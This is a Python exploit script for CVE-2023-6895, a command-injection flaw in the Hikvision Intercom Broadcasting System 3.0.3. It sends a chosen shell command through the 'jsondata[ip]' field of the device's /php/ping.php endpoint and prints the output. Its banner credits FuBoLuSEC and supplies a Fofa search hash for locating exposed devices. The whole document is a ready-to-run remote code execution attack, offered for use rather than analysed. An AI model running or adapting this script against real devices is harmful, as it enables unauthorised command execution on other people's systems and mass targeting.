import argparse import requests def get_args(): parser = argparse.ArgumentParser(prog="CVE-2023-6895.py", formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50), ) parser.add_argument("-u", "--url", help="URL of target site (ex: http://target.com)") parser.add_argument("-c", "--cmd", default="id", help="Command to execute (default = id)") args = parser.parse_args() return args def Exploit(url, cmd): cmd = "jsondata%5Btype%5D=3&jsondata%5Bip%5D=" + cmd headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'Pragma': 'no-cache', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-User': '?1', 'Te': 'trailers', 'Connection': 'close' } expurl = url + '/php/ping.php' requests.packages.urllib3.disable_warnings() try: req = requests.post(expurl, data=cmd, headers=headers, timeout=10, verify=False) data = str(req.text.encode('utf-8').decode('unicode_escape')) print("目标:" + url + "结果:" + data) except: pass def main(): print() print('===================================================================================') print('| Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) |') print('| CVE-2023-6895 |') print('| by FuBoLuSEC |') print('| Fofa:icon_hash="-1830859634" |') print('===================================================================================\n') args = get_args() Exploit(args.url, args.cmd.strip()) if __name__ == '__main__': main()